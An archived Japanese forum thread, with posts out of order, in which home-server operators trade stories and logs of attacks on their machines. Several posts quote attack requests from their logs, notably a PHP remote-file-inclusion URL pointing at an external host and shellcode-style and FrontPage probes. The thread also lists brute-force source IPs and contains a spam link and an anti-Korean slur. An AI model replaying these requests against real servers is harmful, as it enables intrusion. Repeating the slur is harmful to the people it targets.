自宅鯖に攻撃された回数

1 :DNS未登録さん:03/04/29 16:24 ID:ZxRqeijn.net
漏れはアタックされたことないが
ウィルスを入れられたことはある
ドレぐらいあるか、話し合いましょう〜

10 :DNS未登録さん:03/05/02 23:09 ID:???.net

同じプロバイダかもしれないが、Coderedが…ガクガクブルブル

15 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/10 03:42 ID:???.net

>>14
日頃の行いだと思いたい。

#Nimdaがまったくないのは不自然だなぁと思うんですが、
#まったく同じスクリプトを仕込んだ取引先の鯖群はヒットしまくってるし・・・

66 :DNS未登録さん:2008/05/16(金) 18:49:20 ID:???.net

一人暮らしすればいい話だが

34 :DNS未登録さん:04/02/21 05:15 ID:???.net

54 :51:04/10/25 19:34:10 ID:???.net

>>53
もう少し説明したい。

まず、縁のゆかりもない俺の自宅鯖に、一分程の間に43回、複数の名前
(test, jane, webmaster, mysql他いろいろ)でsshしてきた経緯がわからない。

こっちは人にアカウントあげた覚えはない。

くだんのIPを自分でつつけば分かるが、サーバソフト(proftpd, apache, php)の
バージョンが揃って2002年前半のそれだった(もちろん、返す値が真実と
かけはなれてる可能性は当然ある)。

# 流石に当該サイトの脆弱性検証まではやってないので(立派なクラックじゃん)

そこのftpdにアクセスすると、あるドメインが表示されたので、ぐぐってみると
すぐ近くのIPを持つ韓国語のサイトに出た。
こっちはさらに酷かった。
ネームサーバがたってたのでdigで試すと、関係ないドメインまで検索してくれた。
(そんなの、プロバイダが顧客向けにやれば十分だと思うが…)

6000まで開いていた。インターネット越しにX動かす神経が信じられない。
(単に気づかないだけなら、さらに救いがたい)

ちなみに使ってるサーバのバージョンは同一だった。

これだけの事実を見ると、管理者の勘違いOR悪戯というより、そのシステムを
乗っ取った小僧の可能性を疑いたくなる。

# 他に勘違いしてる可能性があったら教えてくれ。

64 :DNS未登録さん:2008/05/15(木) 09:28:02 ID:???.net

うちのおかんから攻撃がありました!

かーちゃん……電源ぬくなよ

76 :DNS未登録さん:2008/08/03(日) 14:06:34 ID:vBrtm0/V.net

運用が安定してからsshの不正ログインチャレンジは毎日200はあったな

sshdのポートを変えたらゼロになった

37 :DNS未登録さん:04/02/25 23:18 ID:???.net

16 :.:03/05/16 00:00 ID:???.net

12 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/03 01:09 ID:???.net

86 :DNS未登録さん:2009/03/10(火) 14:51:10 ID:???.net

それは降伏では・・・

51 :DNS未登録さん:04/10/24 20:35:32 ID:GhNIlj98.net

自宅鯖のログに、こんなのが。
$ grep “Invalid user” $LOG |cat -n |tail -n1
43 Oct DD HH:MM:SS SERVER sshd[NUM]: Invalid user test from 211.192.229.4

そっちを適当につついて見たが、サーバソフトが軒並2年前のバージョンで、
当然脆弱性てんこ漏り…

要するに、此奴、踏台になってる模様。

82 :DNS未登録さん:2008/08/24(日) 15:48:10 ID:???.net

>81
ぐぐるぐらい自分でやれ。
http://www.securityfocus.com/bid/14651

45 :DNS未登録さん:04/03/03 22:12 ID:???.net

32 :DNS未登録さん:04/02/21 01:10 ID:???.net

88 :DNS未登録さん:2009/04/18(土) 08:20:51 ID:???.net

つ iptables
つ ipfilter
つ ipfw
つ PeerGuardian

57 :DNS未登録さん:2005/05/19(木) 11:56:11 ID:???.net

携帯のIPで朝から140件ほど攻撃を受けてる

63 :DNS未登録さん:2008/05/14(水) 09:44:30 ID:???.net

面白い事書こうと必死杉
頭ワルソー

43 :DNS未登録さん:04/03/03 06:33 ID:???.net

41 :DNS未登録さん:04/03/03 06:31 ID:???.net

42 :DNS未登録さん:04/03/03 06:32 ID:???.net

78 :DNS未登録さん:2008/08/14(木) 11:44:05 ID:???.net

俺実際にルータの設定いじられたことあるw
知らない間にポート全部開いてたw
アタック通知設定にすべきだな

65 :DNS未登録さん:2008/05/16(金) 10:45:49 ID:???.net

おかん最強のクラッカー

65 :DNS未登録さん:2008/05/16(金) 10:45:49 ID:???.net

おかん最強のクラッカー

83 :DNS未登録さん:2008/08/24(日) 16:40:08 ID:???.net

>>82
いや、この手のアクセスが毎日数時間おきに来てるって事が言いたかったわけです
他の人はどうかなっと

39 :DNS未登録さん:04/02/26 05:08 ID:???.net

71 :70:2008/07/01(火) 20:54:05 ID:???.net

読み直してみたら70の日本語が変だorz

87 :DNS未登録さん:2009/04/10(金) 20:22:56 ID:???.net

鯖がよく落ちるなと思って、今日セキュリティログ見てみたら30171番ポートにボットネットから攻撃されてやがった。
どうすればいいものか。

21 :山崎渉:03/05/28 17:09 ID:???.net

     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔‾∪ ̄ ̄〕
  = ◎――◎                      山崎渉

14 :DNS未登録さん:03/05/10 01:47 ID:???.net

>>12
何でそんなに少ないんですか?

92 :DNS未登録さん:2010/05/23(日) 13:19:53 ID:???.net

65.74.168.210 (c1resolver1.ctmail.com)

最近やたら多いんだけど
カードの情報盗まれた可能性もあるので警察に届けた方がいいかしら?

85 :DNS未登録さん:2009/03/09(月) 03:30:00 ID:???.net

いつも使ってるPCで自鯖運営すると結構便利
攻撃されたらすぐLANケーブル抜くことができるし。

80 :DNS未登録さん:2008/08/17(日) 02:56:35 ID:???.net

>>78
それはルータとサーバのどっちの設定に問題があったんだ?

74 :DNS未登録さん:2008/07/25(金) 14:22:17 ID:???.net

>>73
とりあえずチョンは弾けよ

53 :DNS未登録さん:04/10/25 11:14:19 ID:???.net

>>51
バージョンが古いからってセキュリティホールが残っているものだと考えるのは
厨だぞ。パッケージ製品ならともかく、オープンソースならパッチをバックポート
して適用する場合もあるわけだし。

67 :DNS未登録さん:2008/05/30(金) 17:32:46 ID:Ot7IDYtB.net

ちょっと穴空けて、踏み台にされるのを待っているんだけど・・・

ツールとかドサッと置いたのを確認してから、いただいちゃおうって考えね。

91 :DNS未登録さん:2010/04/08(木) 00:25:48 ID:???.net

>>69
 Tomcatの管理用コンテキストにアクセスできてしまうことがある。
 ほとんどの場合、Basic認証付きがデフォルトだから、大丈夫。

93 : 忍法帖【Lv=40,xxxPT】(4+0:8) 【25.9m】 電脳プリオン ◆3YKmpu7JR7Ic :2012/10/20(土) 23:20:08.85 ID:???.net ?PLT(12079)

0回

23 :DNS未登録さん:03/06/27 17:24 ID:20MVCv9j.net

☆可愛い娘満載のHサイト☆(閲覧無料)
http://endou.kir.jp/yuminet/link.html

47 :DNS未登録さん:04/03/05 01:41 ID:???.net

52 :DNS未登録さん:04/10/24 21:10:43 ID:???.net

>>50
まあ、時代遅れといえばそうなんだろうな。
おまえさんのサイトが脆弱そうだから攻撃してるんじゃなくて、そいつらのサイトが脆弱なだけだと思うけど。

68 :DNS未登録さん:2008/05/30(金) 23:38:18 ID:???.net

>>67
それ何ていう死亡フラグ?

6 :DNS未登録さん:03/05/01 19:53 ID:???.net

「<ヽ`∀´>」 からミサイルが飛んできますた。

72 :DNS未登録さん:2008/07/02(水) 07:47:37 ID:xJhKfCu8.net

認証とか面倒なんでポート全解放 管理者パスワード無し
最近不安定でexploler.exeが起動しないからアップデートもしてない

でもアタックなんてされるわけないから大丈夫

13 :DNS未登録さん:03/05/03 16:30 ID:???.net

そんなことより>>8よ、
ぱんつくったことあるか?

69 :DNS未登録さん:2008/07/01(火) 16:45:50 ID:yWt1W5th.net

最近、8080ポート空けてると毎日

GET /manager/html

ってのがやたら来るんだけど、何がしたいのやら

59 :DNS未登録さん:2007/12/06(木) 00:30:04 ID:???.net

機能サーバーで足の小指打った。

29 :山崎 渉:03/08/15 22:46 ID:???.net

    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

24 :ちよ:03/06/27 19:23 ID:???.net

46 :DNS未登録さん:04/03/03 22:13 ID:???.net

18 :DNS未登録さん:03/05/16 09:45 ID:???.net

>>16
私怨?

5 :演@ usen-43x233x52x230.ap-USEN.usen.ad.jp:03/05/01 02:03 ID:???.net

おまいは今までに喰ったパンの数を覚えて(ry

48 :DNS未登録さん:04/03/06 10:18 ID:???.net

数える気にもならん…

38 :DNS未登録さん:04/02/26 02:01 ID:???.net

31 :DNS未登録さん:04/02/19 17:45 ID:???.net

28 :ぼるじょあ ◆ySd1dMH5Gk :03/08/02 05:04 ID:???.net

     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔‾∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

17 :DNS未登録さん:03/05/16 00:02 ID:XyccI3ke.net

26 :DNS未登録さん:03/07/15 00:40 ID:???.net

自鯖が攻撃された事はあるが、
自鯖に攻撃された事はない。

81 :DNS未登録さん:2008/08/24(日) 03:31:04 ID:???.net

最近
/send_reminders.php?includedir=http://www.*.de/2007/pics/id.txt???
みたいなのが毎日数時間置きぐらいにきてるけど、他の人はどう?
とりあえずユーザーエージェントとしてとして残ってるlibwww-perlをDROPしたから403を返してるけど、それでもずーとアクセスあるのよね
php使ってないのにさ
IPも次から次へと変えてるっぽい

60 :DNS未登録さん:2007/12/29(土) 21:17:17 ID:???.net

↓こんなのが1回
GET /w00tw00t.at.ISC.SANS.DFind:)

↓こんなのが週数回
SEARCH /¥x90¥xc9¥(略)¥x90¥
POST /_vti_bin/_vti_aut/fp30reg.dll

50 :仕様書無しさん:04/10/04 23:56:03 ID:odsrLN5V.net

今頃、CodeRedとか、Nimdaに感染されてることを想定して、
アタックしてくるヤツがいるんだけど。
そいつら、時代遅れ?

79 :DNS未登録さん:2008/08/17(日) 02:19:47 ID:???.net

怖えええええええww

36 :DNS未登録さん:04/02/21 22:28 ID:???.net

33 :DNS未登録さん:04/02/21 01:11 ID:???.net

77 :DNS未登録さん:2008/08/10(日) 05:32:39 ID:Th0Uozn8.net

サーバーにハッキングしようとする悪質な輩を晒し上げ
毎日こんな調子だわ orz

Failed logins from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 13 times
80.232.45.118: 523 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 2 times
83.16.138.122 (afi122.internetdsl.tpnet.pl): 6 times
207.58.135.82 (pi.com): 114 times

Illegal users from:
74.52.28.122 (7a.1c.344a.static.theplanet.com): 2 times
80.232.45.118: 1608 times
81.86.39.135 (81-86-39-135.dsl.pipex.com): 1 time
83.16.138.122 (afi122.internetdsl.tpnet.pl): 788 times
207.58.135.82 (pi.com): 2030 times

44 :DNS未登録さん:04/03/03 12:13 ID:???.net

20 :山崎渉:03/05/22 01:54 ID:???.net

━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―

75 :DNS未登録さん:2008/07/27(日) 20:39:04 ID:???.net

サーバーにハッキングしようとする悪質な輩を晒し上げ

Failed logins from:
70.86.87.58 (3a.57.5646.static.theplanet.com): 573 times
88.191.78.192 (sd-13533.dedibox.fr): 312 times

Illegal users from:
88.191.78.192 (sd-13533.dedibox.fr): 5 times

11 :DNS未登録さん:03/05/02 23:14 ID:qAFinOV6.net

10

25 :DNS未登録さん:03/07/04 14:02 ID:???.net

>>15
> #Nimdaがまったくないのは不自然だなぁと思うんですが、
apache_attack.cgi の 79行目。
if ( &ap_analog(“default.ida”) ) { &at_print_day; }
を、
if ( &ap_analog(“default¥.ida”) ) { &at_print_day; }
もしくは、
if ( &ap_analog(“¥Qdefault.ida¥E”) ) { &at_print_day; }
にしておくと安心するかと思われ(w

参考になったらSNSでシェアお願いします!

レスを投稿する(名前省略可)

この記事を読んだ方へのおすすめ

  • 自宅サーバ野郎、てめぇのOS教えろよ

    元スレ 1 :DNS未登録さん:2008/07/03(木) 20:29:37 ID:???.net MacOSX Server(TigerServer) 149 :DNS未登録さん:2009/08/10(月) 05:53…

  • 【age】広告ホイホイ@自宅サーバ板【進行】

    元スレ 1 :DNS未登録さん:03/08/13 11:10 ID:???.net age続けて広告書き込みを釣るための専用スレッドです。 他のクソスレ使えという意見もあるかと思いますが、関係ないスレタイで わかりにくい…

  • 俺が作るサーバ

    元スレ 1 : ◆YYhrbPKEYQ :03/03/23 20:30 ID:o2FXXLGy.net はじまりはじまり 10 : ◆YYhrbPKEYQ :03/03/23 21:58 ID:???.net < …

  • ラック、サーバケース総合スレin自宅鯖板 Part1

    元スレ 1 :DNS未登録さん:2006/05/09(火) 01:46:50 ID:l+PXtmJY.net 何故かないので建ててみた 自作ラックとかも嘉門達夫 関連スレ 【フルタワー】サーバケース Part6【ラックマ…

  • 【いま何時?】NTPサーバ【ソーネダイタイネー】

    元スレ 1 :DNS未登録さん:05/01/24 18:56:27 ID:w1oYxjN6.net ●● 時刻同期ソフトを使ってる人々へ ●● 同期先のNTPサーバに福岡大学(clock.nc.fukuoka-u.ac.…

  • 鯖主やってんなら当然寿司屋で鯖頼むよな?

    元スレ 1 :DNS未登録さん:2005/04/03(日) 21:28:35 ID:XwiqmdmI.net 食うよな?食わない奴いないよな? 26 :DNS未登録さん:2005/04/06(水) 01:48:17 ID…

  • 通報の仕方

    元スレ 1 :DNS未登録さん:03/07/08 22:18 ID:???.net 自宅鯖をやってると荒らし行為やF5攻撃などをされることもあると思いますが そういう時のためにメールのテンプレを作りませう 参考 ttp:…

  • 極限まで安いサーバを張るスレ

    元スレ 1 :DNS未登録さん:04/04/20 20:07 ID:zYWWNL0e.net 基本は題名どおりで、激安価サーバを張ってください。 どこまでも機能云々ではなく、ただ安さだけを求めて。 中古品を売ってるサイト…

  • 企業サーバーの質問

    元スレ 1 :DNS未登録さん:03/05/01 05:20 ID:???.net 用途はいろいろ 知ってる人は答えてください 93 :DNS未登録さん:2006/10/02(月) 01:06:14 ID:???.net…

  • グアムでサーバ置けますか?

    元スレ 1 : :03/03/23 05:07 ID:niTT5/5e.net 今度初めての海外旅行でグアムに行きます。 そこで、結構長めの滞在なので、旅行中グアムでサーバー作ろうと思ってます。 グアムにプロバイダとかあ…

  • Webminの使い方教えて!

    元スレ 1 :DNS未登録さん:04/07/04 20:25 ID:6OJHSaY/.net 設定ファイルいじるよりは簡単なんだろうけど なーんか入り組んでるんだよねー http://www.webmin.com/ 55…

  • [ぷらら] sendmail port25あぼん [禁止]

    元スレ 1 :DNS未登録さん:04/12/07 22:43:48 ID:/hC6vCx5.net ぷららが迷惑メール対策強化,国内プロバイダ初「ポート25ブロッキング」採用  ぷららネットワークスは12月7日,来年1月…

最近のコメント

匿名 : 合同会社グラウンドステップ 被害者の会 part2
 吉川利幸さんが社長を務めるランサーズでの評価 すご... (5/05)
匿名 : Opera12(Presto) Part8
 Dragonflyが使えなくなったorg (6/25)
匿名 : あえてコマンドライン禁止のLinux
 いまではほとんどのディストリのインストで日本語環境までコマン... (6/15)
ページTOPへ↑